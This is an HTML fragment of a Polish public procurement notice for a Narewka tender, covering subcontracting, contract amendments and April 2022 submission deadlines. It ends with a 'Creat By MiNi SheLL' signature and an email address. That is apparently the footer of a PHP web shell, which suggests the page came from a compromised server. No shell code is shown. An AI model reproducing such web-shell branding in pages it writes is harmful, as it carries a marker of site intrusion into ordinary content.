odpowiednio.<br/>3. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych<br/>zadań. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy, wówczas<br/>Wykonawca zobowiązany jest wskazać w formularzu ofertowym - załącznik nr 1 do SWZ, części<br/>zamówienia/ rodzaj robót, których wykonanie zamierza powierzyć podwykonawcom i podać<br/>firmy podwykonawców, o ile są już znane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowe zapisy odnośnie przewidywanych zmian umowy, zawarto w istotnych<br/>postanowieniach umowy stanowiących załącznik do SWZ dostępnej na stronie prowadzonego<br/>postępowania: https://platformazakupowa.pl/pn/narewka. (brak wystarczającego miejsca w<br/>publikatorze) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/narewka</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-06 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com